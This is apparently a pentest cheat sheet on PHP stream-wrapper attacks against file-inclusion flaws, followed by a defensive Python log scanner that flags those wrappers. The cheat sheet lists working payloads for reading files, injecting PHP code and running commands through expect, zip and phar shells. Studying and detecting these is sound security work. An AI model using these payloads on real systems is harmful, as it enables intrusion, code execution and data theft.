PHP Wrappers File Inclusion

PHP stream wrappers can be used to exploit an LFI/RFI on a server as an alternative to path traversal and similar techniques.

To read a file (encoded as base64): php://filter/read=convert.base64-encode/resource=/path/to/file

To inject some code (encoded as base64):

  • data://text/plain;base64,<base64 php code here>
  • allow_url_include must be enabled 🛑

To inject some code (sent as POST data), use php://input as the included path and send the code in the request body:

$ curl -s -X POST --data '<?php /* code */ ?>' [...]

We can also use some special wrappers:

  • expect://id: runs the id command; the expect extension is not often installed
  • zip://./path/to/shell.zip%23shell.php&cmd=id: if the zip wrapper is enabled, we can load a PHP file stored inside a zip archive (%23 is a URL-encoded #; the .zip extension is not mandatory).
  • phar://./path/to/shell.phar%2Fshell.php&cmd=id: if the phar wrapper is enabled, we can load a PHP file stored inside a phar archive (%2F is a URL-encoded /; zip-based phars also work; the .phar extension is not mandatory).
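As an added example (not part of this cheat sheet), the following Python script scans web-server access-log lines for the wrapper schemes listed above, so a defender can spot attempts that use them. The request target is URL-decoded twice before matching so that encodings such as %23 or %253A do not hide a scheme. The log lines, IP addresses and the combined-log field layout are constructed assumptions.

```python
"""Flag PHP stream-wrapper schemes in web access-log query strings.

Added example, not code from the original cheat sheet. The log lines
below are constructed; the layout mimics a common combined access log.
"""
import re
from urllib.parse import unquote

# Wrapper schemes named on the cheat sheet. Matched case-insensitively
# against the URL-decoded request target.
WRAPPER_SCHEMES = re.compile(
    r"(?i)\b(php://(?:filter|input)|data:|expect://|zip://|phar://)"
)

# The quoted request line: "GET /index.php?page=... HTTP/1.1"
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def find_wrappers(target: str) -> list:
    """Return the wrapper schemes found in a request target after decoding.

    Decoding twice catches double-encoded payloads (e.g. %253A for ':').
    This is detection logic, so the occasional false positive from a
    literal '%25' in a benign URL is acceptable.
    """
    decoded = unquote(unquote(target))
    return sorted({m.group(1).lower() for m in WRAPPER_SCHEMES.finditer(decoded)})


def scan_log(lines) -> list:
    """Return (client_ip, method, target, schemes) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        schemes = find_wrappers(m.group("target"))
        if schemes:
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, m.group("method"), m.group("target"), schemes))
    return hits


# Constructed sample log: three wrapper attempts from 203.0.113.7, one benign
# request, and one double-encoded data: attempt from 198.51.100.9.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page='
    'php://filter/read=convert.base64-encode/resource=/path/to/file HTTP/1.1" 200 1843',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page='
    'zip://./path/to/shell.zip%23shell.php&cmd=id HTTP/1.1" 200 512',
    '198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2211',
    '203.0.113.7 - - [10/Oct/2023:13:56:12 +0000] "POST /index.php?page='
    'php%3A%2F%2Finput HTTP/1.1" 200 77',
    '198.51.100.9 - - [10/Oct/2023:13:57:00 +0000] "GET /index.php?page='
    'data%253A%252F%252Ftext%252Fplain%253Bbase64%252CQUJD HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for client_ip, method, target, schemes in scan_log(SAMPLE_LOG):
        print(f"{client_ip} {method} {target} -> {', '.join(schemes)}")
```

Running the script prints the four wrapper attempts and skips the benign `page=about` request. In a real deployment the same `find_wrappers` check can be applied to the `page`-style parameter values of any include-like endpoint, and a positive match is a strong reason to review whether `allow_url_include` and the zip, phar and expect wrappers are actually needed on that host.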

Refer to payloads to generate phar archives or to write PHP code.